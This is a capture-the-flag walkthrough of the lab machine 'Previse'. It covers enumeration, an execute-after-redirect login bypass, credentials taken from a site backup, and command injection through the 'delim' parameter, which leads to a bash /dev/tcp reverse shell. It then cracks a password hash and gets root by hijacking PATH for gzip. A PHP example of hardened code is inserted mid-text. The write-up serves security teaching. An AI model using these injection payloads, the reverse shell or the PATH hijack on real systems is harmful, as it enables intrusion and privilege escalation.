We start with nmap to discover open ports and services.
Nmap Scan
nmap -sC -sV -oA previse 10.10.11.104
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have two open ports, SSH on 22 and HTTP on 80, and neither version has a serious known vulnerability.
So let's enumerate the HTTP port.
Enumerating HTTP
Going to http://10.10.11.104 redirects us to http://10.10.11.104/login.php
The page ends with .php, so we know it's a PHP app; when we run a directory bruteforcer we need to specify the .php extension.
I tried logging in with admin:admin, admin:password and tried the simple login bypass test' or 1=1 -- --, but nothing worked.
So I launched gobuster with raft-medium-words.txt from SecLists:
gobuster dir -u http://10.10.11.104/ -w raft-medium-words.txt -t 100 -x php -b 404,403
When I try to access any of these files it redirects me to login.php. BUT when I intercept the response before the redirect is followed, it says 302 Found but I can still see the content of the page.
Let's visit /accounts.php
As you can see we can create a new user by submitting the same data as the form has, so to create a new user we need to send a POST request to /accounts.php with POST parameters username and password and confirm.
Now we have a new user embo1:embo1, let's log in with it.
And we are logged in. There is a SITEBACKUP.ZIP file and a user newguy on the FILES page, let's download it.
As the file name says, it’s the backup of the web site.
The config.php file contains mysql credentials.
root:mySQL_p@ssw0rd!:)
The logs.php file passes the POST parameter delim directly to the exec function without any validation.
So we can intercept the request and do something like this: delim=space;whoami
But the output is not reflected in the response, so let's try pinging our machine instead: delim=space;ping -c1 <Our IP>
(Don't forget to URL encode) and run tcpdump to capture it: sudo tcpdump -n -i tun0 icmp
We received the ICMP echo request, so we have command execution. Let's get a shell on the box.
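Both weaknesses found above, the auth check that sends a 302 but still renders the protected page, and logs.php handing delim to exec, are simple to close. The following is an added example of the hardened form, not the site's own code; the function names, the delimiter set and the script path are assumptions.

```php
<?php
// Added example (not the Previse site's code): hardened versions of the two
// defects described in the write-up. Names and the script path are assumptions.

// 1. Auth gate. The original kept rendering the page after sending the 302,
//    so the body leaked to anyone who read the response instead of following
//    the redirect. Terminate the script right after the header.
function require_login(): void
{
    session_start();
    if (empty($_SESSION['user'])) {
        header('Location: login.php', true, 302);
        exit; // without this, everything after the check is still sent
    }
}

// 2. Log export. The original passed $_POST['delim'] straight to exec().
//    Map the request to a fixed set of values instead of shelling out with
//    attacker-controlled text.
const DELIMITERS = [
    'comma' => ',',
    'space' => ' ',
    'tab'   => "\t",
];

function export_delimiter(string $requested): string
{
    if (!array_key_exists($requested, DELIMITERS)) {
        http_response_code(400);
        exit('unsupported delimiter');
    }
    return DELIMITERS[$requested];
}

function export_logs(string $script, string $requested): string
{
    // Even with an allowlisted value, quote every argument and use a fixed
    // interpreter path rather than concatenating into a shell string.
    $cmd = '/usr/bin/python3 ' . escapeshellarg($script) . ' '
         . escapeshellarg(export_delimiter($requested));
    exec($cmd, $out, $rc);
    if ($rc !== 0) {
        http_response_code(500);
        exit('export failed');
    }
    return implode("\n", $out);
}

require_login();
echo export_logs('/var/www/html/log_process.py', $_POST['delim'] ?? 'comma');
```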
Initial Foothold
Let's replace the ping command with a reverse shell and run a netcat listener: delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
We received a connection and we are on the box as www-data.
Getting User
After some enumeration I couldn't find anything, but remember the MySQL credentials we got before? Let's log in to MySQL using root:mySQL_p@ssw0rd!:)
I found an accounts table inside the previse database that contains the md5crypt hash of the user m4lwhere.
Let's save the hash to a file and crack it with hashcat or john: hashcat -m 500 hash.txt rockyou.txt
OR john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt
I use hashcat on my Windows host because it's much faster than john.
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
Now we have m4lwhere:ilovecody112235!, let's SSH into the machine (or just use su m4lwhere --).
Getting Root
By running sudo -l we can run /opt/scripts/access_backup.sh as root.
Looking at the script, it runs gzip without specifying the full path, which means we can modify the $PATH variable so that the script finds gzip in a directory where we have placed our own gzip script.
Let's create our gzip script in the /dev/shm/ directory and make it executable: chmod +x gzip
Now modify the $PATH variable so it starts with the directory that holds our script.
Run a netcat listener: nc -nvlp 1337
and run the script: sudo /opt/scripts/access_backup.sh
And we are ROOT!